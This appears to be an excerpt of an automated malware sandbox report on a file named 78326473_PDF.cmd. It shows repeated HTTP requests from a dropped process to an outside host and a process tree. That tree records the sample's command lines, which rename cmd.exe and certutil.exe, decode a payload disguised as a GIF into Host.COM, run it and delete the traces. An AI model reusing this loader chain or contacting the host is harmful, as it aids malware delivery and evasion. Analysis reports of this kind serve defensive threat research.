2024-11-26 08:40:02 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	50025	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:40:03 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:40:04 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:40:03 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:40:04 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:40:04 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:40:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	50032	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:40:06 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:40:06 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:40:06 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:40:06 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	50037	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:40:08 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:40:08 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:40:08 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:40:08 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:40:08 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:40:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	50044	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:40:10 UTC	179	OUT	GET /MIEJOHNSONERE/190_Ovqqzpvffya HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:40:11 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 08:40:10 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:40:11 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	50049	108.170.55.202	443	8004	C:\Users\Public\Libraries\Host.COM

Timestamp	Bytes transferred	Direction	Data
2024-11-26 08:40:12 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 08:40:13 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 08:40:12 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 08:40:13 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 08:40:13 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 08:40:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	03:38:04
Start date:	26/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\78326473_PDF.cmd" "
Imagebase:	0x7ff6fcb00000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	03:38:04
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	03:38:05
Start date:	26/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Imagebase:	0x7ff62f9c0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	4
Start time:	03:38:05
Start date:	26/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff719660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	03:38:05
Start date:	26/11/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff62f9c0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	03:38:05
Start date:	26/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
Imagebase:	0x7ff719660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	03:38:05
Start date:	26/11/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\78326473_PDF.cmd" "C:\\Users\\Public\\Host.GIF" 3
Imagebase:	0x7ff68ac30000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	03:38:07
Start date:	26/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Imagebase:	0x7ff719660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	10
Start time:	03:38:07
Start date:	26/11/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Imagebase:	0x7ff68ac30000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	03:38:08
Start date:	26/11/2024
Path:	C:\Users\Public\Libraries\Host.COM
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\Host.COM
Imagebase:	0x400000
File size:	1'414'656 bytes
MD5 hash:	7614CE01178ED3B6E66ECCBB0300FCF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	false

Target ID:	12
Start time:	03:38:08
Start date:	26/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:	0x7ff719660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	13
Start time:	03:38:08
Start date:	26/11/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
Imagebase:	0x7ff719660000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true